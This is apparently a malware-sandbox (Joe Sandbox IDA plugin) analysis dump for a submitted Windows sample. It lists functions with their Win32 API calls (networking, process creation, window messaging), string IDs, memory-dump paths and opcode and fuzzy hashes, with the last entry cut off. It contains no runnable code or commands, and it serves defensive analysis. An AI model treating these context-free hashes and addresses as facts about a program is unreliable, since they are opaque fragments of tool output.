                                                                                  • Instruction Fuzzy Hash: BE51EF359002469AEF15AF28C885AFABBE4EF75310F25405AEC919B2D0D7349DA2CB90
                                                                                  APIs
                                                                                  • Sleep.KERNEL32(00000000), ref: 001DF2A2
                                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 001DF2BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalMemorySleepStatus
                                                                                  • String ID: @
                                                                                  • API String ID: 2783356886-2766056989
                                                                                  • Opcode ID: 7ae339392a46ccf421eee475b7e896ae73bd4835a3ef35d36645f926c4ca923d
                                                                                  • Instruction ID: d6fe9160b05f8f2f28d1d73bd1511c9f9da5baa92cce5d1dcc86364026d56c8f
                                                                                  • Opcode Fuzzy Hash: 7ae339392a46ccf421eee475b7e896ae73bd4835a3ef35d36645f926c4ca923d
                                                                                  • Instruction Fuzzy Hash: 2C5136714087449BD320AF14EC86BABBBF8FFA5300F81885DF1D9411A5EB708969CB66
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002457E0
                                                                                  • _wcslen.LIBCMT ref: 002457EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper_wcslen
                                                                                  • String ID: CALLARGARRAY
                                                                                  • API String ID: 157775604-1150593374
                                                                                  • Opcode ID: 152f9e4c382971d99b16a216b283b1448da490fb44f1ed8563ab4db54fd1f355
                                                                                  • Instruction ID: efb601422b4a295681cf55c3172fae37f1f53af4327dc020a8e6ab22dcc3f06a
                                                                                  • Opcode Fuzzy Hash: 152f9e4c382971d99b16a216b283b1448da490fb44f1ed8563ab4db54fd1f355
                                                                                  • Instruction Fuzzy Hash: DB41C231E106199FCB18DFA8C8859AEBBF5FF69324F10402DE445AB252EB709D91CF90
                                                                                  APIs
                                                                                  • _wcslen.LIBCMT ref: 0023D130
                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0023D13A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CrackInternet_wcslen
                                                                                  • String ID: |
                                                                                  • API String ID: 596671847-2343686810
                                                                                  • Opcode ID: 091576baa934fb64e3b087fe3ba407ff4eb0b4a0b336fc69c3a2f506f7b47f28
                                                                                  • Instruction ID: 5a1e707052e05ca3c93e9599960d9ab109de6c5e234cf44995beed29448afcc3
                                                                                  • Opcode Fuzzy Hash: 091576baa934fb64e3b087fe3ba407ff4eb0b4a0b336fc69c3a2f506f7b47f28
                                                                                  • Instruction Fuzzy Hash: 41313E71D10209ABCF15EFA5DC85EEEBFB9FF28300F100019F819A6166E771AA16DB50
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00253621
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0025365C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$DestroyMove
                                                                                  • String ID: static
                                                                                  • API String ID: 2139405536-2160076837
                                                                                  • Opcode ID: e5420500f4c52146fd167703b901aa9a3bdd7def6b822236f339d95f3423d29f
                                                                                  • Instruction ID: ebb242a8c782e94899e259261907e910ea6796ab9e81009c82ccab6b7c443427
                                                                                  • Opcode Fuzzy Hash: e5420500f4c52146fd167703b901aa9a3bdd7def6b822236f339d95f3423d29f
                                                                                  • Instruction Fuzzy Hash: C031A071120205AEDB10DF28DC80EBB73ADFF98761F10961DF86597280DA30EDA5CB68
                                                                                  APIs
                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 0025461F
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00254634
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: '
                                                                                  • API String ID: 3850602802-1997036262
                                                                                  • Opcode ID: 457fb765279ffd60f20386b134b0411df40909c0f8bfff87aab4780d0c8675ad
                                                                                  • Instruction ID: 81f3755f93ef49471d6c6af57c04c32d437b7ea219415e5906fdbd377ec6c585
                                                                                  • Opcode Fuzzy Hash: 457fb765279ffd60f20386b134b0411df40909c0f8bfff87aab4780d0c8675ad
                                                                                  • Instruction Fuzzy Hash: B6314974A0030A9FDB14DF69C980BDABBB9FF19305F50406AED04AB341E770A995CF94
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0025327C
                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00253287
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: Combobox
                                                                                  • API String ID: 3850602802-2096851135
                                                                                  • Opcode ID: 4b5deb01b5aefb5506c380be7431756d772d8eda6f76996efbbd048e21583f1d
                                                                                  • Instruction ID: 047cbef421b5a9233960302a08a79d4329e9bec4f99ff9d8b857504e44ff232c
                                                                                  • Opcode Fuzzy Hash: 4b5deb01b5aefb5506c380be7431756d772d8eda6f76996efbbd048e21583f1d
                                                                                  • Instruction Fuzzy Hash: 381100712206096FEF25DE54DC80EBB376AEB943A1F105128FD18E7290D631DD618B64
                                                                                  APIs
                                                                                    • Part of subcall function 001C600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001C604C
                                                                                    • Part of subcall function 001C600E: GetStockObject.GDI32(00000011), ref: 001C6060
                                                                                    • Part of subcall function 001C600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 001C606A
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0025377A
                                                                                  • GetSysColor.USER32(00000012), ref: 00253794
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                  • String ID: static
                                                                                  • API String ID: 1983116058-2160076837
                                                                                  • Opcode ID: a44ffa6f795a9dcad4d355cbdf334f202ee2032e5d3e81ead150bdfa988c5722
                                                                                  • Instruction ID: ef05c572d02728f75356795529d4b8ff4695af3e080c40ab5c385b315f4e92c9
                                                                                  • Opcode Fuzzy Hash: a44ffa6f795a9dcad4d355cbdf334f202ee2032e5d3e81ead150bdfa988c5722
                                                                                  • Instruction Fuzzy Hash: 111159B2A2020AAFDB00DFA8CC45EEA7BB8FB08345F005514FD55E2250E774E8659B50
                                                                                  APIs
                                                                                  • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0023CD7D
                                                                                  • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0023CDA6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Internet$OpenOption
                                                                                  • String ID: <local>
                                                                                  • API String ID: 942729171-4266983199
                                                                                  • Opcode ID: 1f04c11ddd62c6f307fbe4a27128853340c7cca6378d0c0b3351d5c770f64dd0
                                                                                  • Instruction ID: 41176c1cc8be00e6e4404c43ac965582a8b09f4eb7c625e54e319f3749e91bb4
                                                                                  • Opcode Fuzzy Hash: 1f04c11ddd62c6f307fbe4a27128853340c7cca6378d0c0b3351d5c770f64dd0
                                                                                  • Instruction Fuzzy Hash: 2711C6B562563A7AD7384F668C49FE7BE6CEF167A4F204236B109A3080D7709860D7F0
                                                                                  APIs
                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 002534AB
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002534BA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: LengthMessageSendTextWindow
                                                                                  • String ID: edit
                                                                                  • API String ID: 2978978980-2167791130
                                                                                  • Opcode ID: c8a0484b495f9169f5eb823ee4497a3ccc61eb12c549cb71a8e578372c9c24c2
                                                                                  • Instruction ID: 124e222d468c2c84ecdafd2da159e85b0c40cf993a6413e98bcae045092540f4
                                                                                  • Opcode Fuzzy Hash: c8a0484b495f9169f5eb823ee4497a3ccc61eb12c549cb71a8e578372c9c24c2
                                                                                  • Instruction Fuzzy Hash: DA11EF31120209AFEB118E64EC44ABB376AEB003B5F605324FD20931D0C371DCA99B58
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  • CharUpperBuffW.USER32(?,?,?), ref: 00226CB6
                                                                                  • _wcslen.LIBCMT ref: 00226CC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen$BuffCharUpper
                                                                                  • String ID: STOP
                                                                                  • API String ID: 1256254125-2411985666
                                                                                  • Opcode ID: 2b87a8f7d670bde0f91c8bde7f37cded7b0ecce8d51ec221000f24fcaf4a997f
                                                                                  • Instruction ID: 7f6783f92f67850d3bdf717120c7ed11e40451f62f8dabc270102646f451d013
                                                                                  • Opcode Fuzzy Hash: 2b87a8f7d670bde0f91c8bde7f37cded7b0ecce8d51ec221000f24fcaf4a997f
                                                                                  • Instruction Fuzzy Hash: 8F010433A2053BABCB20AFFDEC8C9BF33A4EB717147500529E86297190EB31D920C650
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA
                                                                                  • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00221D4C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 624084870-1403004172
                                                                                  • Opcode ID: 263be2d47321a9605ae62fcbe92ac957fbdc2d3f990160e6cfa641554c27e6ed
                                                                                  • Instruction ID: b2a1ea05082fe9ce412d1afa5ecd5b115d8e9ef208c873e76a4e3a7952ccdb35
                                                                                  • Opcode Fuzzy Hash: 263be2d47321a9605ae62fcbe92ac957fbdc2d3f990160e6cfa641554c27e6ed
                                                                                  • Instruction Fuzzy Hash: 3101F535621228BBCB08EFE0EC15DFE7368EB76350B00051AE832572C1EB3099388760
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA
                                                                                  • SendMessageW.USER32(?,00000180,00000000,?), ref: 00221C46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 624084870-1403004172
                                                                                  • Opcode ID: 6b5cf5685db7a45262f10aea4ab68be56fdabb834f9ec998c5610c3cafdbbcdc
                                                                                  • Instruction ID: 265bd77fbdab3f5b9e799933e4bbbf5eab78a4f655e05ed2cd7fcc553c2ee7f2
                                                                                  • Opcode Fuzzy Hash: 6b5cf5685db7a45262f10aea4ab68be56fdabb834f9ec998c5610c3cafdbbcdc
                                                                                  • Instruction Fuzzy Hash: E101D87965111876CB04EBD0E955EFF77A89B31340F10001AA416771C1EA249E3886B6
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA
                                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00221CC8
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 624084870-1403004172
                                                                                  • Opcode ID: 48fc11560ccaf07a22df00ffa81258c36fc91d9206009c48994e3a33404c4e55
                                                                                  • Instruction ID: 9f23db46b91a512cc8ba46819931dd672313a2ae61a7f577497aa30ff2461564
                                                                                  • Opcode Fuzzy Hash: 48fc11560ccaf07a22df00ffa81258c36fc91d9206009c48994e3a33404c4e55
                                                                                  • Instruction Fuzzy Hash: 5601A77965112976CB14FBD0EA15EFE77A89B31340B14001AB80177281EA649F389676
                                                                                  APIs
                                                                                  • __Init_thread_footer.LIBCMT ref: 001DA529
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: Init_thread_footer_wcslen
                                                                                  • String ID: ,%)$3y!
                                                                                  • API String ID: 2551934079-3039355943
                                                                                  • Opcode ID: e7987ec14f6375231c50c68866392dad43c53ec4fa38d9166931c60e47141814
                                                                                  • Instruction ID: 583856772bc1b8ebd3f9a7838b1a844e852f20f048219ef1ca57e11da34193ff
                                                                                  • Opcode Fuzzy Hash: e7987ec14f6375231c50c68866392dad43c53ec4fa38d9166931c60e47141814
                                                                                  • Instruction Fuzzy Hash: 0F012632B406149BCA09F768F85FF6D33689F29720FD5002AF5121B3C2EF509D458A9B
                                                                                  APIs
                                                                                    • Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD
                                                                                    • Part of subcall function 00223CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00223CCA
                                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00221DD3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                                  • String ID: ComboBox$ListBox
                                                                                  • API String ID: 624084870-1403004172
                                                                                  • Opcode ID: ff379b44bdafb13b7e7d261f6b90ae2dc698391ed220cd1f2de612bd7da234c4
                                                                                  • Instruction ID: 2ba2104fb05daade72cbdc2ed23ce4ca31743401da14fb4ce2bbc75ab87b63d0
                                                                                  • Opcode Fuzzy Hash: ff379b44bdafb13b7e7d261f6b90ae2dc698391ed220cd1f2de612bd7da234c4
                                                                                  • Instruction Fuzzy Hash: DEF0F971A61228B6C704FBE4EC55FFE7768AB32340F040919F422672C1DB6499288664
                                                                                  APIs
                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00293018,0029305C), ref: 002581BF
                                                                                  • CloseHandle.KERNEL32 ref: 002581D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseCreateHandleProcess
                                                                                  • String ID: \0)
                                                                                  • API String ID: 3712363035-118726745
                                                                                  • Opcode ID: 6b4cfa32676cb14f4c0bdc0730c7626b08dd519f13916ecd3e03202d0182de82
                                                                                  • Instruction ID: 549d8643af49fa417ef00566433ce2dc11352b09c56c4f43293c33123ca34bca
                                                                                  • Opcode Fuzzy Hash: 6b4cfa32676cb14f4c0bdc0730c7626b08dd519f13916ecd3e03202d0182de82
                                                                                  • Instruction Fuzzy Hash: ABF082B6650304BEE720AB62BC4EFB73A5CEB08751F004461FB0CD51A2E6B58E1087F8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcslen
                                                                                  • String ID: 3, 3, 16, 1
                                                                                  • API String ID: 176396367-3042988571
                                                                                  • Opcode ID: 4eb45be2295516c81dcfc6da9568c6561d6fe8e6593fc3fb007a7afd1cbad339
                                                                                  • Instruction ID: d84703e73ecedbc54f58db5cd62980288787570d1785a67014c68f20763feec1
                                                                                  • Opcode Fuzzy Hash: 4eb45be2295516c81dcfc6da9568c6561d6fe8e6593fc3fb007a7afd1cbad339
